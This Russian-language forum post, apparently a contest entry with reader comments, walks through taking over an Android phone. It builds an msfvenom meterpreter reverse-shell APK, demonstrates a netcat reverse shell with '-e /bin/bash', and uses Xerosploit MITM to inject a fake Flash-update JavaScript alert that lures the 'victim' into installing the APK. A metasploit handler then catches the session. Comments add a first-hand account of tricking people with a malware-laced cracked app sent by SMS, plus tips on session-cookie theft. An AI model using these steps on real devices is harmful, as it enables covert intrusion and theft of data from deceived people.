Конкурс Способ доставки payload на смартфон базированный на android.

Статья для участия в конкурсе на codeby.

Приветствую вас дорогие друзья.

Сегодня я бы хотел рассказать вам о простом способе взлома смартфона на базе android. В большей степени способ основан на социальной инженерии. Но все же нам придется провести малый ряд атак.

Словарик хакера.

Metasploit - коротко говоря платформа предназначенная для поиска и эксплоутации уязвимостей.
Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки.

Exploit - это программа или фрагмент кода использующий уязвимость программного обеспечения(или же веб ресурса и операционной системы)
Для того что бы хоть как-то разобраться в эксплоитах представим себе такой самый простой пример:

Вы хотите получить привилегию root на вашем android устройстве. Так вот те программы которые вы используете для получения root - это и есть эксплоиты использующие уязвимость android.

Помимо таких эксплоитов есть те что намного страшней. Это эксплоиты 0day. Эти эксплоиты написаны на неизвестную или мало кому известную уязвимость и тем самым могут нанести больший вред.

Что же , сегодня мы создадим payload. Моим способом доставим его нашей "жертве" и получим сессию meterpreter.

Meterpreter - это пэйлоад который обеспечивает доступ к интерактивному шеллу.


Немного про социальную инженерию(СИ)

Помойму, сколько бы лет не прошло, но самым главным оружием хакера останется социальная инженерия(в том случае если мир не захватят роботы). Социальная инженерия основана на человеческом доверии(в частности). Про СИ написано множество книг.
Может какую-то систему и нельзя взломать, но она создана человеком. А человеческое доверие самая большая уязвимость.

Вобщем при помощи социальной инженерии мы можем управлять человеком.

В дополнение.

Мой способ состоит из 3-х небольших частей.

ч. 1 ---> создание пэйлоада.
ч. 2 ---> собственно СИ.
ч. 3 ---> получение meterpreter.

Теперь приступим к делу.

Часть 1. - Payload.

Что же для начала запустим metasploit.
Код:
msfconsole

Screenshot from 2017-10-31 16-15-26.png

Теперь давайте откроем новую вкладку в терминале(не у всех, но Shift+Ctrl+T)

Приступим к созданию пэйлоада. Для этого нам понадобится утилита msfvenom.
Эта утилита предназначена для тестирования на проникновение устройств на базе android.

Для начала узнаем наше "имя" в локальной сети.
Код:
ifconfig

Screenshot from 2017-10-31 16-14-59.png

Как видим у меня это 192.168.1.3
Теперь пишем следующее
Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > tester.apk

LHOST - это как раз таки имя вашего хоста.

PORT - порт к которому в дальнейшем подключится "зараженное" android устройство.

Сейчас постараюсь обьяснить вам как же они работают.
У вас на машине открывается порт. Мы указывали 4444. Далее к этому порту конектится(подключается) android устройство которое мы наградили payload'ом. А теперь рассмотрим все на примере ncat.

Откройте 2-е вкладки в терминале. Допустим первая вкладка это машина хакера, а вторая - жертва. В первой вкладке пишем
Код:
nc -l -p 8543
Тем самым мы открыли на машине хакера порт 8543. Теперь во второй вкладке пишем следующее
Код:
nc 192.168.1.6 8543 -e /bin/bash
То есть жертва подключилась к открытому порту на хакерской машине 192.168.1.6 и дала доступ к командной оболочке.
Теперь в первой вкладке вы можете прописать какую-либо команду и вы выполните ее на "машине жертвы". На самом же деле настоящие пайлоады работают намного сложней. Но думаю суть вы уловили.

Так вот, теперь у нас имеется файл tester.apk - наш пэйлоад.
Теперь к интересному.

Часть 2.

В этой части мы будем использовать MITM фрэймворк для проведения атаки "человек по середине" - Xerosploit.

MITM (Man In The Middle - "Человек по середине") -- атака позволяющая хакеру прослушать трафик(подменить) в каком-то смысле претворившись роутером.

Давайте для начала установим xerosploit. Насколько мне известно , в основном он зависим от python, nmap, hping3,
build-essential, ruby-dev, libpcap-dev, libgmp3-dev, tabulate, terminaltables..

Так что перед его установкой установите эти пакеты.
Теперь пишем
Код:
1. git clone https://github.com/LionSec/xerosploit
2. cd xerosploit
3. python install.py

Теперь выберите свой дистрибутив. После установки неплохо бы разобраться в функционале.

Xerosploit весьма многофункционален и легок в использовании. Вот некоторые его возможности:

pscan - сканирование портов.
sniff - сниффинг.
injecthtml - иньекция html кода.
injectjs - иньекция javascript кода.
dspoof - передача трафика на другой локальный хост.
dos - denial of service атака.
И еще много другое.

Запускаем xerosploit
Код:
xerosploit

Screenshot from 2017-10-31 16-15-29.png

Теперь давайте просканируем нашу сеть.
Код:
> scan
А вот и мое андроид устройство.

Screenshot from 2017-10-31 16-16-46.png

Теперь выберем его. Для этого просто прописываем имя хоста.
П.С: для просмотра функционала просто пропишите help.

Мой способ палевный, но все же рабочий. Давайте зальем наш пэйлоад на какой-нибудь простеньки хостинг.

Теперь можете создать js файл с таким содержимым
Код:
<script>
alert("Приносим свои извинения, но ваша версия Flash Player устарела и вы не можете просмотреть материал данного ресурса. Обновленная версия находится тут:  http://site.test/flash.html");
</script>

Далее в новой вкладке снова запустим xerosploit. Сканируем сеть и выбираем нашу цель.
Теперь выберем такую функцию как injectjs > run > имя вашего js файла.

Часть 3.

Теперь осталось получить сессию meterpreter.
В изначально запущенном metasploit пишем следующие команды.
Код:
> use multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.3
> set LPORT 4444
> exploit

Screenshot from 2017-10-31 16-21-46-1.png

И после всех проведенных нами атак жертва по идее открывает наш tester.apk ( желательно переименовать в flash.apk) и мы получаем контроль над ее устройством.
Если я не ошибаюсь то можно вместо xerosploit использовать beef. Так появится еще больше шансов что скрипт выполнится нормально.
На этом все!
 
Последнее редактирование:

vag4b0nd

Red Team
24.05.2017
315
1 498
BIT
58
Если честно ничего не понятно, не расписано не создание apk приложения ни доставка его на хост.
Хмм...
Как это не расписано создание apk? А вот доставка на хост. Это же самое простое, что я не стал описывать.
 

BadBlackHat

Platinum
05.02.2017
217
305
BIT
9
А извиняюсь про создание невнимательно прочитал, ну доставка на хост мне кажется это важная часть использования какого то из векторов атаки
 
  • Нравится
Реакции: id2746 и Tihon49

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Норм. все написано, исползован классический пример доставки ратника, но тема СИ до конца не раскрыта...
Вот мой пример как я раньше делал, когда блэчил..)
Писал смс жертве " Вася привет вот тебе как и обещал навигатор navitel крякнутый бесплатный, я ща улетаю на отдых и как обещал даю его тебе, щастливо оставаться! " хотя терпилу конечно звали не Вася я делал уклон что мол я ошибся номером и оставлял ссылку с натуральным зараженным крякнутым навигатором прокатывало 90%
 

kallibr44

Green Team
20.06.2017
18
6
BIT
0
Очень приятный принцип предоставления информации, читатель не устает он постоянной нагрузки, переключаясь с текста на терминологию, написано довольно понятно, лично мне понравилось, не смотря на то, что я всё это знаю)
 
  • Нравится
Реакции: Tihon49
A

Alien_Alien

fatal: repository 'https//github.com/LionSec/xerosploit' does not exist
msf > git clone https//github.com/LionSec/xerosploit
[*] exec: git clone https//github.com/LionSec/xerosploit

fatal: repository 'https//github.com/LionSec/xerosploit' does not exist

написанно понятно , у меня вот такая проблемка
 

vag4b0nd

Red Team
24.05.2017
315
1 498
BIT
58
fatal: repository 'https//github.com/LionSec/xerosploit' does not exist
msf > git clone https//github.com/LionSec/xerosploit
exec: git clone https//github.com/LionSec/xerosploit

fatal: repository 'https//github.com/LionSec/xerosploit' does not exist

написанно понятно , у меня вот такая проблемка

Слушай.. Там же написано "В нововой вкладке" это прописать)
[doublepost=1509723344,1509723293][/doublepost]
fatal: repository 'https//github.com/LionSec/xerosploit' does not exist
msf > git clone https//github.com/LionSec/xerosploit
exec: git clone https//github.com/LionSec/xerosploit

fatal: repository 'https//github.com/LionSec/xerosploit' does not exist

написанно понятно , у меня вот такая проблемка
И не в msf ;D
 

Pushkinmazila

Green Team
20.11.2016
34
26
BIT
2
Меня удивляет как люди могут на такое вестись...
(Я про ваших жертв)
 

Bunder99

Green Team
19.04.2017
20
12
BIT
2
Неплохая статья, но действительно хотелось бы больше интересных реализаций по части СИ, чего-то менее шаблонного))

ЗЫ. Улыбнуло как ты "подтер" МАКи своих устройств, стерев общеизвестный октет Вендора и оставив для всеобщего обозрения уникальные октеты)) без обид, просто на будущее)
 

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Xerosploit = Bettercap при работает захватывает Cookie сессий. Как использовать эти Куки ? или Вообщем существует ли какой нибудь инструмент, для снифинга куков и в дальнейшем их использования. (Допустим снифит трафик, находит кукий файлы, при нажатий на них открывается браузер с той же сессий что и у жертвы).
 

vag4b0nd

Red Team
24.05.2017
315
1 498
BIT
58
Xerosploit = Bettercap при работает захватывает Cookie сессий. Как использовать эти Куки ? или Вообщем существует ли какой нибудь инструмент, для снифинга куков и в дальнейшем их использования. (Допустим снифит трафик, находит кукий файлы, при нажатий на них открывается браузер с той же сессий что и у жертвы).
Я в ближайшее время буду дописывать свой цикл про Получение доступа к аккаунтам социальных сетей. И там все будет дописано.
 
  • Нравится
Реакции: OBLIVIONNN

Bunder99

Green Team
19.04.2017
20
12
BIT
2
Xerosploit = Bettercap при работает захватывает Cookie сессий. Как использовать эти Куки ? или Вообщем существует ли какой нибудь инструмент, для снифинга куков и в дальнейшем их использования. (Допустим снифит трафик, находит кукий файлы, при нажатий на них открывается браузер с той же сессий что и у жертвы).
Cookie-cadger или вариант суровых челябинских мужиков: wireshark+greasemonkey :)
 

Santaklaus

Member
13.12.2017
10
0
BIT
4
Приветствую, выдало такое.invalid payload selected т.е. выбрана недопустимая полезная нагрузка, что в этой ситуации делать, подскажите пжл.
 
W

Wisp29

Подскажите, в чём может быть проблема всё делаю по инструкции, но после команды exploit появляется
Started reverse TCP handler on 192.168.1.38:4444
и далее ничего не происходит
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!